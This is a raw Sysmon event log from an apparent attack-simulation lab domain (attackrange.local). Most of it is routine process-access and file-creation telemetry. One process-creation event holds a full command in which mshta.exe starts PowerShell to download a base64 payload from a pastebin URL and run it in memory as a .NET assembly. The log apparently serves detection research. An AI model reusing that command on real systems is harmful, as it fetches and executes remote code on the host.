08:03:14.492 10341000x8000000000000000108150Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.483{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108149Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.483{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000108148Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.472{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ajjdulhb.cfv.ps12021-10-04 08:03:14.472 10341000x8000000000000000108147Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.431{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108146Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.424{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108145Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.422{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108144Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.408{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000108143Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:14.380{58E9C193-B542-615A-8202-00000000FC01}8704\PSHost.132778081940535001.8704.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000108142Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.346{58E9C193-B542-615A-8202-00000000FC01}8704ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_r0njhcib.js2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108141Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.326{58E9C193-B542-615A-8202-00000000FC01}8704ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gyb02s4o.xve.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000108140Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.310{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gyb02s4o.xve.ps12021-10-04 08:03:14.310 10341000x8000000000000000108139Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.279{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108138Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.210{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71920204651F3F7433AA840168EACADF,SHA256=4975BAC7173332FB8DE638C01B44402FF90222159E9BF16C3DB95C5844073F60,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108137Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:12.507{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51939-false10.0.1.12-8000- 10341000x8000000000000000108136Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.126{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8702-00000000FC01}8824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108135Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.126{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8702-00000000FC01}8824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108134Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.126{58E9C193-B542-615A-8702-00000000FC01}88248852C:\Windows\system32\conhost.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108133Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.126{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778590187FC52AD848E5F9A1C58C3FCA,SHA256=E31AA6DD81B995E72E94530872A47A173747905C38173EFE70BCADFF8523602F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108132Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8502-00000000FC01}8780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108131Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8502-00000000FC01}8780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108130Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B542-615A-8702-00000000FC01}8824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108129Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108128Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108127Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108126Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.110{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108125Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-B542-615A-8502-00000000FC01}87808820C:\Windows\system32\conhost.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108124Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108123Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108122Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-B541-615A-8102-00000000FC01}86088756C:\Windows\system32\mshta.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108121Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.105{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000108120Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108119Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108118Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108117Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.094{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B542-615A-8502-00000000FC01}8780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108116Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.079{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 